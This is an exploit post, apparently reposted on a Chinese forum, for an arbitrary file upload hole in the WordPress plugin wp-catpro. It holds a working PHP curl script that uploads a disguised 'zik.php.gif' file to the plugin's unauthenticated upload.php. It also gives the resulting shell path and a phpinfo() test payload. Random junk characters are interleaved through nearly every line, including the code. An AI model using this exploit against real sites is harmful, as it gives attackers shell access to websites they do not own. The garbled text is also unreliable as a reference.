Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability0 {' K& U8 V; z+ \) V* m" }6 _
#-----------------------------------------------------------------------/ b8 _/ C# C9 u7 o! }/ |
3 I7 r" G+ P/ t3 h( ?" \
作者 => Zikou-16; X! }- E! C- T C5 F; a$ R3 g
邮箱 => zikou16x@gmail.com4 z! \4 S( ?# p1 d
测试系统 : Windows 7 , Backtrack 5r3 {, S9 S, h7 h2 Y' u
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip7 @; z9 x) q6 f" ~- `+ ~& V
####
; f: \6 x( Q2 R* N) [ J3 g0 m $ U5 @- Z1 s1 Q( I
#=> Exploit 信息:8 x* F0 [& Y( H; w0 a; g! g, v3 _
------------------' W& f3 x7 p, n
# 攻击者可以上传 file/shell.php.gif
: K* m% m# y* i+ h% j5 B% d5 Q# ("jpg", "gif", "png") // Allowed file extensions
5 m2 d; u( {7 I- U# u4 S# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)0 \5 t- L! Z @2 _( J
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)$ m5 |9 _; k; Q1 k
------------------
! g; Z! ?' [: P/ y# v" x6 @/ N ) ~$ S) \4 d9 b/ D% c# Y
#=> Exploit
3 K$ b& P' B- |( S! d- C" d( J-----------
! C {% W4 @: \3 o<?php
7 Z4 q- B1 q, r# ]4 a/ G- g
7 F& z7 D2 ^/ o6 P( m1 |$uploadfile="zik.php.gif";/ d' f" J6 ^- q5 P" Q
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
0 a$ |8 d- c3 E, Q6 z4 L6 b; scurl_setopt($ch, CURLOPT_POST, true);' z7 i& s8 m, G# o8 M- O; f
curl_setopt($ch, CURLOPT_POSTFIELDS,
6 O6 B( E+ E$ j- darray('Filedata'=>"@$uploadfile",
- j8 e( t+ f" }, y4 V6 J$ F0 v& m'folder'=>'/wp-content/uploads/catpro/'));
2 {) ], @1 f; w# T, c. n' ~curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);; K6 S7 U) n8 e, q! ^
$postResult = curl_exec($ch);* y K2 M, D& q8 Q/ ~- T
curl_close($ch);* h" x+ D( L) C5 C
0 \, G5 @+ ^* Q8 G0 V O( b6 N- Lprint "$postResult";
. N' ^+ R6 K; [* m0 ^
8 C0 y+ O8 \" w$ i2 H& }; |Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
8 y6 [. K1 g/ { ?>6 w& I4 g$ t: J, p% a1 ~8 ?
<?php. n+ S! S3 a- C
phpinfo();
7 O+ M8 m y Y7 e; G& G6 G?> |